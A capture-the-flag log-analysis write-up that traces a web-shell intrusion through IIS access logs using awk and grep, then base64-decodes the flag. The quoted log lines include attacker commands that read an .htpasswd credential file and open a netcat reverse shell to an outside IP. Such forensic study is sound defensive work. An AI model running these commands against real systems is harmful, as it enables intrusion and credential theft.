Tags: iis grep awk logs access 

Rating:

## 1 - Ingress

> Our website was hacked recently and the attackers completely ransomwared our server!
> We've recovered it now, but we don't want it to happen again.
> Here are the logs from before the attack, can you find out what happened?

We start inspecting some log fields, looking for something uncommon. For example, in the [`cs(Referer)` field](https://en.wikipedia.org/wiki/HTTP_referer):
```shell
$ awk '{print $(NF-4)}' attack.log | sort | uniq -c | sort -nr
6947 -
1343 https://digitaloverdose.tech/dovercon/sponsoring-edition-2021
1318 https://digitaloverdose.tech/dovercon/2021/speakers
1286 https://digitaloverdose.tech/dovercon/2021/code-of-conduct
1278 https://digitaloverdose.tech/dovercon/2021/about
1268 https://digitaloverdose.tech/dovercon/2021
1262 https://digitaloverdose.tech/privacy
1255 https://digitaloverdose.tech/ctf/2021-autumn
1230 https://digitaloverdose.tech/team
1225 https://digitaloverdose.tech/faq
1224 https://digitaloverdose.tech/dovercon/2021/cfp
1214 https://digitaloverdose.tech/copyright
1213 https://digitaloverdose.tech/ctf/2021-spring
1210 https://digitaloverdose.tech/dovercon
1210 https://digitaloverdose.tech/conference
1208 https://digitaloverdose.tech/dovercon/2021/sponsoring
1206 https://digitaloverdose.tech/dovercon/cfp-edition-2021
1205 https://digitaloverdose.tech/dovercon/team-edition-2021
1204 https://digitaloverdose.tech/home
1202 https://digitaloverdose.tech/ctf/about
1197 https://digitaloverdose.tech/
1194 https://digitaloverdose.tech/ctf
1149 https://digitaloverdose.tech/dovercon/schedule-edition-2021
1149 https://digitaloverdose.tech/dovercon/2021/mentors
1135 https://digitaloverdose.tech/dovercon/2021/schedule
1118 https://digitaloverdose.tech/dovercon/2021/team
1090 https://digitaloverdose.tech/dovercon/speakers-edition-2021
7 https://digitaloverdose.tech/ywesusnz
1 cs(Referer)
```

What is that `ywesusnz`? Let's look which requests were made from that URI:
```shell
$ grep ywesusnz attack.log
2021-09-06 20:44:19 135.233.142.30 GET ywesusnz cmd%3Dcd+.. 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/faq 200 0 0 20
2021-09-06 20:44:45 135.233.142.30 GET ywesusnz cmd%3Dpwd 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 26
2021-09-06 20:45:04 135.233.142.30 GET ywesusnz cmd%3Dwhoami 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 25
2021-09-06 20:45:16 135.233.142.30 GET ywesusnz cmd%3Dhostname 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 25
2021-09-06 20:45:46 135.233.142.30 GET ywesusnz cmd%3Dnetstat+-peanut 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 21
2021-09-06 20:46:04 135.233.142.30 GET ywesusnz cmd%3Dcat+%2Fvar%2Fwww%2F.htpasswd 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 22
2021-09-06 20:46:12 135.233.142.30 GET ywesusnz cmd%3Dcat+RE97YmV0dGVyX3JlbW92ZV90aGF0X2JhY2tkb29yfQ== 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 26
2021-09-06 20:46:19 135.233.142.30 GET ywesusnz cmd%3Dnc+-e+%2Fbin%2Fsh+207.35.160.84+4213 443 - 20.132.161.193 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) https://digitaloverdose.tech/ywesusnz 200 0 0 20
$ echo RE97YmV0dGVyX3JlbW92ZV90aGF0X2JhY2tkb29yfQ== | base64 -d
DO{better_remove_that_backdoor}
```

Original writeup (https://scavengersecurity.com/posts/digitaloverdose-loganalysis/#1---ingress).